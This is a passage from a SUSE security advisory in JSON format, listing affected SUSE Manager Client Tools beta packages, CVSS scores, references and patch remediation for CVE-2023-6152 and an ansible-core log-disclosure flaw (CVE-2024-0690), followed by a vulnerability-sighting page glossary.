"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-6152",
"url": "https://www.suse.com/security/cve/CVE-2023-6152"
},
{
"category": "external",
"summary": "SUSE Bug 1219912 for CVE-2023-6152",
"url": "https://bugzilla.suse.com/1219912"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "moderate"
}
],
"title": "CVE-2023-6152"
},
{
"cve": "CVE-2024-0690",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-0690"
}
],
"notes": [
{
"category": "general",
"text": "An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. Information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-0690",
"url": "https://www.suse.com/security/cve/CVE-2024-0690"
},
{
"category": "external",
"summary": "SUSE Bug 1219002 for CVE-2024-0690",
"url": "https://bugzilla.suse.com/1219002"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-04-24T09:10:16Z",
"details": "moderate"
}
],
"title": "CVE-2024-0690"
}
]
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…